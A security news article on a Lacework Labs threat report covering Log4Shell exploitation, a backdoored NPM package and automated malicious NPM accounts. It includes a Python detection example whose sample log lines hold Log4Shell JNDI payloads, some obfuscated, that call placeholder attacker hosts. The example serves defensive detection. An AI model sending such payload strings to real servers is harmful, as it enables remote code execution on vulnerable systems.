Log4Shell is Employed in 31% of Malware infections, Lacework Labs Identifies

Log4j exploits were believed to have started as early as 1st December 2021.


In the latest cloud threat report by Lacework, it was disclosed that the infamous Log4Shell vulnerability was exploited as an initial infection vector in 31% of cases identified by Lacework researchers over the past six months. 

The software vendor’s report confirms that the Log4j vulnerability was abused extensively by malicious actors, as cybersecurity researchers had suspected when it emerged in December last year. 

According to Lacework Labs, it initially noticed a flood of requests carrying malicious payloads immediately after the Log4Shell bug was disclosed; these were mainly the result of researchers scanning for the vulnerability. Over time, however, they were displaced by genuinely malicious requests as threat actors adopted publicly available proof-of-concept exploits.

“Over time, we watched scanning activity evolve into more frequent attacks, including some that deployed crypto-miners and Distributed Denial of Service (DDoS) bots to affected systems,” it explained. “In addition to improving their payloads, adversaries continued to adapt their exploitation methods to stay ahead of signature-based detections used by many types of security products.”
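To make the point about signature evasion concrete, here is an added example in Python (not code from the Lacework report): a naive substring signature for the Log4Shell lookup string beside a detector that first URL-decodes each access-log line and resolves Log4j's nested lookup forms before matching. The log lines, host names and function names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format); host names are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:03:12:44 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [11/Dec/2021:03:13:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example:1389/a}"',
    '10.0.0.9 - - [14/Dec/2021:09:41:10 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fc2.example%3A1389%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [15/Dec/2021:02:03:55 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://c2.example:1389/o}"',
]

INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")   # a ${...} whose body has no nested braces
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def naive_hits(lines):
    """Plain substring signature: the kind of check obfuscated payloads slip past."""
    return [n for n, line in enumerate(lines, 1) if "${jndi:" in line.lower()]


def _resolve(match):
    """Evaluate one innermost lookup as Log4j would before the jndi handler sees it;
    lookups this example does not model (jndi, env, ...) are left as written."""
    body = match.group(1)
    head, _, rest = body.partition(":")
    if head.lower() == "lower":
        return rest.lower()
    if head.lower() == "upper":
        return rest.upper()
    if ":-" in body:                  # ${name:-default} yields the default when name is unset
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(text, max_rounds=20):
    """URL-decode, then collapse nested lookups from the inside out until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_log4shell(lines):
    """Return (line_number, normalized_payload) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((n, norm[m.start():norm.find("}", m.start()) + 1]))
    return hits
```

On the sample lines the substring signature flags only the plain scanner request, while the normalizing detector also surfaces the URL-encoded and nested-lookup variants with their decoded callback URLs, which is the kind of normalization a detection pipeline needs before a signature is worth anything.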

In addition to Log4j, multiple threat actors have also employed a backdoor in the ua-parser-js NPM package to gain access to Linux systems and launch the XMRig open-source miner. The original hacking group had compromised the NPM developer’s account to push a malicious payload into the package.

In fact, malicious actors increasingly favor NPM as an attack vector. A report from Checkmarx this week claimed that attackers have simplified the process of creating new NPM accounts from which to distribute supply chain malware.

“The attacker has fully automated the process of NPM account creation and has opened dedicated accounts, one per package, making his new malicious packages much harder to spot,” it explained. “At the time of writing, the threat actor ‘RED-LILI’ is still active and continues to publish malicious packages.”

The researchers at Lacework Labs also investigated issues around compliance, compromised Docker APIs and malicious containers, and additional bugs within the software supply chain. Based on the findings of this report, the researchers advised defenders to evaluate their security infrastructure against industry best practices and to put proactive defence and threat-intelligence capabilities in place, backed by active vulnerability monitoring.